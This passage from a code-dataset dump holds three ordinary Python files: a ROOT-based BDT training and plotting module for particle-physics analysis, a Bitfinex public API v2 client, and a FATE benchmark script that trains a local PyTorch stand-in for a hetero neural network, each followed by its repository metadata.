BDTConfig(**yl.read_yaml(kwargs['bdt_config_file']))\n if 'variables' in kwargs:\n self.variable_list = kwargs['variables']\n elif 'var_list' in kwargs:\n self.variable_list = yl.read_yaml(kwargs['var_list'])['inputs']\n # copy(kwargs['var_list'], os.path.join(kwargs['output_path'], 'var_list.yml'))\n else:\n self.variable_list = None\n self.reader = TrainingReader(**kwargs)\n self.signal_df = None\n self.bkg_df = None\n self.labels = None\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n def load_train_data(self):\n self.signal_df, self.bkg_df, self.labels = self.reader.prepare_data(self.train_cfg,\n variable_list=self.variable_list)\n\n def train_bdt(self):\n clf = AdaBoostClassifier()\n X_train, y_train, X_test, y_test = self.reader.pre_process_data(self.signal_df, self.bkg_df, self.labels,\n self.train_cfg, self.output_path)\n clf.fit(X_train, y_train)\n with open('test.pkl', 'wb') as f:\n pickle.dump(clf, f)\n\n\nclass BDTAnalyser(object):\n def __init__(self, **kwargs):\n if \"input_files\" not in kwargs:\n raise InvalidInputError(\"No input files provided\")\n kwargs.setdefault(\"output_path\", \"./\")\n self.file_handles = [FileHandle(file_name=file_name) for file_name in kwargs[\"input_files\"]]\n self.output_handle = OutputFileHandle(output_dir=kwargs[\"output_path\"])\n for arg, val in kwargs.iteritems():\n if not hasattr(self, arg):\n setattr(self, arg, val)\n ROOT.gROOT.SetBatch(True)\n\n def analyse(self):\n \"\"\"\n Main entry point to perform BDT analysis\n \"\"\"\n self.analyse_train_variables()\n self.perform_overtraining_check()\n self.perform_correlation_analysis()\n self.analyse_roc_curves()\n self.output_handle.write_and_close()\n\n def perform_overtraining_check(self):\n for file_handle in self.file_handles:\n self.analyse_overtraining(file_handle)\n\n def analyse_train_variables(self):\n for file_handle in self.file_handles:\n self.plot_train_variables(file_handle)\n\n def plot_train_variables(self, file_handle):\n def classify():\n variables = {}\n for signal_hist in signal_hists:\n variables[signal_hist.GetName().replace(\"__Signal\", \"\")] = [signal_hist]\n for background_hist in background_hists:\n variables[background_hist.GetName().replace(\"__Background\", \"\")].append(background_hist)\n return variables\n\n signal_hists = file_handle.get_objects_by_pattern(\"[A-z]*__Signal\",\n \"dataset/Method_BDTG/BDTG\")\n background_hists = file_handle.get_objects_by_pattern(\"[A-z]*__Background\",\n \"dataset/Method_BDTG/BDTG\")\n variables_hists = classify()\n for variable_name, variable_hists in variables_hists.iteritems():\n plot_config = pc(name=\"{:s}_{:d}\".format(variable_name, self.file_handles.index(file_handle)),\n color=[ROOT.kRed, ROOT.kBlue],\n draw=\"Hist\",\n watermark=\"Internal\",\n normalise=True,\n ymax=0.2)\n canvas = PT.plot_histograms(variable_hists, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n self.output_handle.register_object(canvas, tdir=\"train_variables\")\n\n def analyse_overtraining(self, file_handle):\n training_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_Train_S\", \"dataset/Method_BDTG/BDTG\")\n training_score_background = file_handle.get_object_by_name(\"MVA_BDTG_Train_B\", \"dataset/Method_BDTG/BDTG\")\n eval_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_S\", \"dataset/Method_BDTG/BDTG\")\n eval_score_background = file_handle.get_object_by_name(\"MVA_BDTG_B\", \"dataset/Method_BDTG/BDTG\")\n\n ymax = 1.6 * max([training_score_signal.GetMaximum(), 
training_score_background.GetMaximum(),\n eval_score_signal.GetMaximum(), eval_score_background.GetMaximum()])\n\n kolmogorov_signal = get_KS(training_score_signal, eval_score_signal)\n kolmogorov_background = get_KS(training_score_background, eval_score_background)\n plot_config = pc(name=\"overtrain_{:d}\".format(self.file_handles.index(file_handle)),\n color=ROOT.kRed,\n draw=\"Marker\",\n style=20,\n ymax=ymax,\n watermark=\"Internal\")\n canvas = PT.plot_obj(training_score_signal, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_signal, plot_config)\n plot_config.style = 20\n plot_config.color = ROOT.kBlue\n PT.add_object_to_canvas(canvas, training_score_background, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_background, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n FT.add_text_to_canvas(canvas, \"KS (signal): {:.2f}\".format(kolmogorov_signal), pos={'x': 0.18, 'y': 0.9},\n color=ROOT.kRed)\n FT.add_text_to_canvas(canvas, \"KS (bkg): {:.2f}\".format(kolmogorov_background), pos={'x': 0.18, 'y': 0.85},\n color=ROOT.kBlue)\n labels = [\"signal (train)\", \"signal (eval)\", \"background (train)\", \"background (eval)\"]\n FT.add_legend_to_canvas(canvas, labels=labels, xl=0.18, xh=0.3, yl=0.6, yh=0.82)\n self.output_handle.register_object(canvas, tdir=\"overtrain\")\n\n def perform_correlation_analysis(self):\n for file_handle in self.file_handles:\n self.analyse_correlations(file_handle)\n\n def analyse_correlations(self, file_handle):\n index = self.file_handles.index(file_handle)\n linear_corr_coeff_signal = file_handle.get_object_by_name(\"CorrelationMatrixS\", \"dataset\")\n linear_corr_coeff_background = file_handle.get_object_by_name(\"CorrelationMatrixB\", \"dataset\")\n plot_config = pc(name=\"linear_corr_coeff_signal_{:d}\".format(index), title=\"signal\", dist=None,\n draw_option=\"COLZTEXT\", ytitle=\"\", ztitle=\"lin. 
correlation [%]\")\n canvas_corr_coeff_signal = PT.plot_obj(linear_corr_coeff_signal, plot_config)\n plot_config.title = \"background\"\n plot_config.name = plot_config.name.replace(\"signal\", \"background\")\n canvas_corr_coeff_background = PT.plot_obj(linear_corr_coeff_background, plot_config)\n self.output_handle.register_object(canvas_corr_coeff_signal)\n self.output_handle.register_object(canvas_corr_coeff_background)\n correlation_hists_signal = file_handle.get_objects_by_pattern(\"scat_.*_Signal_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n correlation_hists_background = file_handle.get_objects_by_pattern(\"scat_.*_Background_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n plot_config_corr = pc(name=\"correlation_hist\", dist=None, draw_option=\"COLZ\", watermark=\"Internal\")\n for hist in correlation_hists_signal:\n variable_info = hist.GetName().split(\"_\")[1:-2]\n plot_config_corr.name = \"corr_\" + \"_\".join(variable_info) + \"_signal_{:d}\".format(index)\n split_index = variable_info.index(\"vs\")\n variable_x = \"_\".join(variable_info[:split_index])\n variable_y = \"_\".join(variable_info[split_index + 1:])\n plot_config_corr.xtitle = variable_x\n plot_config_corr.ytitle = variable_y\n plot_config_corr.ztitle = \"Entries\"\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n for hist in correlation_hists_background:\n plot_config_corr.name = \"corr_\" + \"_\".join(hist.GetName().split(\"_\")[1:-2]) + \"_background_{:d}\".format(\n index)\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n\n def analyse_roc_curves(self):\n for file_handle in self.file_handles:\n self.plot_roc_curves(file_handle)\n\n def plot_roc_curves(self, file_handle):\n def make_plot(dist, pc):\n roc_eff = file_handle.get_objects_by_pattern(dist, \"dataset/Method_BDTG/BDTG\")\n canvas = PT.plot_histograms(roc_eff, pc)\n FM.decorate_canvas(canvas, pc)\n self.output_handle.register_object(canvas, tdir=\"performance\")\n\n index = self.file_handles.index(file_handle)\n pc_roc_eff = pc(name=\"roc_eff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_effBvsS\", pc_roc_eff)\n pc_roc_inveff = pc(name=\"roc_inveff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\", logy=True,\n ytitle=\"Inverse Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_invBeffvsSeff\", pc_roc_inveff)\n pc_roc_rejeff = pc(name=\"roc_rej_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background rejection\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_rejBvsS\", pc_roc_rejeff)\n\n def fit_score(self):\n bdt_score = ROOT.RooRealVar(self.branch_name, \"BDT score\", -0.9, 1.)\n chain = ROOT.TChain(\"Nominal/\" + self.tree_name)\n for file_handle in self.file_handles[1:]:\n chain.Add(file_handle.file_name)\n p0 = ROOT.RooRealVar(\"p0\", \"p0\", 1, -10., 10.)\n p1 = ROOT.RooRealVar(\"p1\", \"p1\", 1, -10., 10.)\n p2 = ROOT.RooRealVar(\"p2\", \"p2\", 1, -100., 100.)\n p3 = ROOT.RooRealVar(\"p3\", \"p3\", 1, -10., 10.)\n p4 = ROOT.RooRealVar(\"p4\", \"p4\", 1, -10., 10.)\n norm = ROOT.RooRealVar(\"norm\", \"norm\", chain.GetEntries(), 0., chain.GetEntries() * 2)\n mass = ROOT.RooRealVar(\"object_m\", \"object_m\", 0., 100000.)\n genpdf = ROOT.RooGenericPdf(\"genpdf\", 
\"genpdf\",\n \"norm * (p0 + p1 * exp(({:s} + 1.) *p2) + \"\n \"p3 * abs({:s})^(({:s} + 1.)*p4))\".format(self.branch_name, self.branch_name,\n self.branch_name),\n ROOT.RooArgList(bdt_score, p0, p1, p2, p3, p4, norm))\n data = ROOT.RooDataSet(\"data\", \"BDT_170526\", chain, ROOT.RooArgSet(bdt_score, mass),\n \"object_m/1000. < 1713. || object_m/1000. > 1841.\")\n frame = bdt_score.frame()\n data.plotOn(frame, ROOT.RooFit.Name(\"data\"), ROOT.RooFit.Binning(25))\n fit_result = genpdf.fitTo(data, ROOT.RooFit.Save())\n canvas = ROOT.TCanvas(\"c\", \"c\", 800, 600)\n canvas.cd()\n genpdf.plotOn(frame, ROOT.RooFit.Name(\"model\"))\n PT.add_fit_to_canvas(canvas, fit_result, genpdf, frame)\n FM.add_atlas_label(canvas, \"Internal\")\n frame.Draw()\n canvas.Modified()\n self.output_handle.register_object(canvas)\n self.output_handle.write_and_close()\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/AnalysisTools/BDTAnalyser.py", "file_name": "BDTAnalyser.py", "file_ext": "py", "file_size_in_byte": 12900, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.MLTrainConfig", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 29, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 30, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 30, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 34, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 34, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.TrainingReader", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 50, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.InvalidInputError", "line_number": 61, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.FileHandle.FileHandle", "line_number": 63, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.OutputHandle.OutputFileHandle", "line_number": 64, "usage_type": "call"}, {"api_name": "ROOT.gROOT.SetBatch", "line_number": 68, "usage_type": "call"}, {"api_name": "ROOT.gROOT", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ROOT.kBlue", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 109, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 109, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 110, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 110, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 122, "usage_type": "call"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 123, "usage_type": 
"call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 124, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 130, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 130, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 132, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 132, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 134, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 135, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 135, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 137, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 137, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 138, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 138, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 139, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 139, "usage_type": "name"}, {"api_name": "ROOT.kRed", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 141, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 141, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 142, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_legend_to_canvas", "line_number": 144, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 144, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 155, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 157, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 157, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 160, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 160, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 167, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 177, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 177, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 178, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 178, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 183, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 183, "usage_type": "name"}, {"api_name": 
"PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 184, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 184, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 194, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 194, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 194, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 195, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 195, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 195, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 199, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 202, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 205, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 210, "usage_type": "call"}, {"api_name": "ROOT.TChain", "line_number": 211, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 214, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 215, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 216, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 217, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 218, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 219, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 220, "usage_type": "call"}, {"api_name": "ROOT.RooGenericPdf", "line_number": 221, "usage_type": "call"}, {"api_name": "ROOT.RooArgList", "line_number": 225, "usage_type": "call"}, {"api_name": "ROOT.RooDataSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooArgSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ROOT.RooFit.Binning", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Save", "line_number": 230, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 230, "usage_type": "attribute"}, {"api_name": "ROOT.TCanvas", "line_number": 231, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 233, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_fit_to_canvas", "line_number": 234, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 234, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_atlas_label", "line_number": 235, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 235, "usage_type": "name"}]} +{"seq_id": "28897294104", "text": "from datetime import datetime\n# local\nfrom . import constants_v2 as _c\nfrom . 
import models_v2 as _m\nfrom ..base import Client\nfrom .server import BitfinexServerV2 as Server\n\n_p = _c.Path\n\n\nclass BitfinexPublic(Client):\n def __init__(self, timeout=30):\n Client.__init__(self, Server(), timeout)\n\n def ticker(self, symbol: _c.Symbol = _c.Symbol.BTCUSD):\n symbol = _c.Symbol.check(symbol).value\n url = self.url_for(_p.TICKER, path_arg=symbol)\n data = self.get(url)\n return _m.TradingTicker.create_from_json(data)\n\n def tickers(self, symbols: list):\n symbols = [_c.Symbol.check(symbol).value for symbol in symbols]\n parameters = {\n 'symbols': symbols,\n }\n url = self.url_for(_p.TICKERS)\n data = self.get(url, params=parameters)\n return {ticker[0]: _m.TradingTicker.create_from_json(ticker[1:])\n for ticker in data}\n\n def trades(self,\n symbol: _c.Symbol = _c.Symbol.BTCUSD,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n url = self.url_for(_p.TRADES, path_arg=symbol)\n data = self.get(url, params=parameters)\n return [_m.TradingTrade.create_from_json(trade)\n for trade in data]\n\n def books(self,\n symbol: _c.Symbol,\n precision: _c.BookPrecision,\n length=None):\n symbol = _c.Symbol.check(symbol).value\n precision = _c.BookPrecision.check(precision).value\n parameters = {\n 'len': length,\n }\n path_arg = '{0}/{1}'.format(symbol, precision)\n url = self.url_for(_p.BOOKS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n return [_m.TradingBook.create_from_json(book)\n for book in data]\n\n def stats(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n section: str,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert key in ['funding.size', 'credits.size', 'credits.size.sym', 'pos.size']\n assert size in ['1m']\n assert side in ['long', 'short']\n assert section in ['last', 'hist']\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'sort': sort,\n }\n path_arg = '{0}:{1}:{2}:{3}/{4}'.format(key, size, symbol, side, section)\n url = self.url_for(_p.STATS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n return _m.Stat.create_from_json(data)\n else:\n return [_m.Stat.create_from_json(stat)\n for stat in data]\n\n def stats_last(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'last', sort)\n\n def stats_hist(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'hist', sort)\n\n def candles(self,\n symbol: _c.Symbol,\n section: str,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert time_frame in ['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1D', '7D', '14D', '1M']\n assert section in ['last', 'hist']\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n path_arg = '{0}:{1}/{2}'.format(time_frame, symbol, section)\n url = self.url_for(_p.CANDLES, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n 
return _m.Candle.create_from_json(data)\n else:\n return [_m.Candle.create_from_json(candle)\n for candle in data]\n\n def candles_last(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'last', time_frame, limit, start, end, sort)\n\n def candles_hist(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'hist', time_frame, limit, start, end, sort)\n", "repo_name": "mglcampos/trader", "sub_path": "htr/helpers/wrappers/bitfinex/client_public_v2.py", "file_name": "client_public_v2.py", "file_ext": "py", "file_size_in_byte": 5460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Client", "line_number": 11, "usage_type": "name"}, {"api_name": "base.Client.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "base.Client", "line_number": 13, "usage_type": "name"}, {"api_name": "server.BitfinexServerV2", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 123, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "argument"}]} +{"seq_id": "26895681135", "text": "import argparse\nimport numpy as np\nimport os\nfrom tensorflow import keras\nimport pandas\nimport tensorflow as tf\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import optimizers\nfrom sklearn import metrics\nfrom pipeline.utils.tools import JobConfig\nfrom sklearn.preprocessing import LabelEncoder\n\nimport torch as t\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nimport tqdm\nfrom pipeline import fate_torch_hook\nfate_torch_hook(t)\n\n\nclass TestModel(t.nn.Module):\n\n def __init__(self, guest_input_shape, host_input_shape):\n super(TestModel, self).__init__()\n\n self.guest_bottom = t.nn.Sequential(\n nn.Linear(guest_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.host_bottom = t.nn.Sequential(\n nn.Linear(host_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.inter_a, self.inter_b = t.nn.Linear(8, 4, True), t.nn.Linear(8, 4, True)\n\n self.top_model_guest = t.nn.Sequential(\n nn.Linear(4, 1, True),\n nn.Sigmoid()\n )\n\n def forward(self, data):\n x_guest, x_host = data[0].type(t.float), data[1].type(t.float)\n guest_fw = self.inter_a(self.guest_bottom(x_guest))\n host_fw = self.inter_b(self.host_bottom(x_host))\n out = self.top_model_guest(guest_fw + host_fw)\n return out\n\n def predict(self, data):\n rs = self.forward(data)\n return rs.detach().numpy()\n\n\nclass TestDataset(Dataset):\n\n def __init__(self, guest_data, host_data, label):\n super(TestDataset, self).__init__()\n self.g = guest_data\n self.h = host_data\n self.l = label\n\n def __getitem__(self, idx):\n return self.g[idx], self.h[idx], self.l[idx]\n\n def __len__(self):\n return len(self.l)\n\n\ndef build(param, shape1, shape2):\n return TestModel(shape1, shape2)\n\n\ndef main(config=\"./config.yaml\", param=\"./hetero_nn_breast_config.yaml\"):\n\n try:\n if isinstance(config, str):\n config = JobConfig.load_from_file(config)\n data_base_dir = config[\"data_base_dir\"]\n else:\n data_base_dir = config.data_base_dir\n if isinstance(param, str):\n 
param = JobConfig.load_from_file(param)\n data_guest = param[\"data_guest\"]\n data_host = param[\"data_host\"]\n idx = param[\"idx\"]\n label_name = param[\"label_name\"]\n # prepare data\n Xb = pandas.read_csv(os.path.join(data_base_dir, data_guest), index_col=idx)\n Xa = pandas.read_csv(os.path.join(data_base_dir, data_host), index_col=idx)\n y = Xb[label_name]\n out = Xa.drop(Xb.index)\n Xa = Xa.drop(out.index)\n Xb = Xb.drop(label_name, axis=1)\n # torch model\n model = build(param, Xb.shape[1], Xa.shape[1])\n Xb = t.Tensor(Xb.values)\n Xa = t.Tensor(Xa.values)\n y = t.Tensor(y.values)\n dataset = TestDataset(Xb, Xa, y)\n batch_size = len(dataset) if param['batch_size'] == -1 else param['batch_size']\n dataloader = DataLoader(dataset, batch_size=batch_size)\n optimizer = t.optim.Adam(lr=param['learning_rate']).to_torch_instance(model.parameters())\n\n if param['eval_type'] == 'binary':\n loss_fn = t.nn.BCELoss()\n\n for i in tqdm.tqdm(range(param['epochs'])):\n\n for gd, hd, label in dataloader:\n optimizer.zero_grad()\n pred = model([gd, hd])\n loss = loss_fn(pred.flatten(), label.type(t.float32))\n loss.backward()\n optimizer.step()\n\n eval_result = {}\n for metric in param[\"metrics\"]:\n if metric.lower() == \"auc\":\n predict_y = model.predict([Xb, Xa])\n auc = metrics.roc_auc_score(y, predict_y)\n eval_result[\"auc\"] = auc\n elif metric == \"accuracy\":\n predict_y = np.argmax(model.predict([Xb, Xa]), axis=1)\n predict_y = label_encoder.inverse_transform(predict_y)\n acc = metrics.accuracy_score(y_true=labels, y_pred=predict_y)\n eval_result[\"accuracy\"] = acc\n\n data_summary = {}\n except Exception as e:\n print(e)\n return data_summary, eval_result\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\"BENCHMARK-QUALITY SKLEARN JOB\")\n parser.add_argument(\"-config\", type=str,\n help=\"config file\")\n parser.add_argument(\"-param\", type=str,\n help=\"config file for params\")\n args = parser.parse_args()\n if args.config is not None:\n main(args.config, args.param)\n else:\n main()\n", "repo_name": "FederatedAI/FATE", "sub_path": "examples/benchmark_quality/hetero_nn_pytorch/local-hetero_nn.py", "file_name": "local-hetero_nn.py", "file_ext": "py", "file_size_in_byte": 4792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5296, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pipeline.fate_torch_hook", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 34, "usage_type": 